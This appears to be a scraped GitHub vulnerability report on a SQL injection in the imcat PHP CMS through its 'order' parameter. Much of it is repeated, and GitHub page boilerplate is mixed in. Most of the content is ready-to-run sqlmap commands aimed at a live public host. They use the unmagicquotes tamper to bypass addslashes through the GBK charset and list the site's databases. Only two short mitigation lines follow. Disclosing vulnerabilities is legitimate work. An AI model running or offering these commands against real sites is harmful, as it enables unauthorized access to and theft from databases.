Use sqlmap(http://sqlmap.org/) and use sqlmap-tamper : unmagicquotes
payload: sqlmap -u 'http://imcat.txjia.com//index.php?sch_faqs=%E6%90%9C%E7%B4%A2&act=1&did=1&mkv=ajax-pick&mod=faqs&order=123&part=1&pid=1&sfid=&sfkw=1&sfop=&stype=&view=1' --dbms mysql -p order --tamper='unmagicquotes'
sqlmap -u 'http://imcat.txjia.com//index.php?sch_faqs=%E6%90%9C%E7%B4%A2&act=1&did=1&mkv=ajax-pick&mod=faqs&order=123&part=1&pid=1&sfid=&sfkw=1&sfop=&stype=&view=1' --dbms mysql -p order --tamper='unmagicquotes' --dbs
GET databases;
Build install imcat and test vuln:
The Vuln-src-code:
because php code set database charset=GBK so bypass addslashes or GPC .
Safetity up:
mysql database charset UTF-8
Checking http input(GET/POST) data fiter dangerous that.
The text was updated successfully, but these errors were encountered:
Exploit vulnerability :

Test parameter : order
Use sqlmap(http://sqlmap.org/) and use sqlmap-tamper : unmagicquotes
payload:
sqlmap -u 'http://imcat.txjia.com//index.php?sch_faqs=%E6%90%9C%E7%B4%A2&act=1&did=1&mkv=ajax-pick&mod=faqs&order=123&part=1&pid=1&sfid=&sfkw=1&sfop=&stype=&view=1' --dbms mysql -p order --tamper='unmagicquotes'sqlmap -u 'http://imcat.txjia.com//index.php?sch_faqs=%E6%90%9C%E7%B4%A2&act=1&did=1&mkv=ajax-pick&mod=faqs&order=123&part=1&pid=1&sfid=&sfkw=1&sfop=&stype=&view=1' --dbms mysql -p order --tamper='unmagicquotes' --dbsGET databases;
Build install imcat and test vuln:
The Vuln-src-code:

because php code set database charset=GBK so bypass addslashes or GPC .
Safetity up:
The text was updated successfully, but these errors were encountered: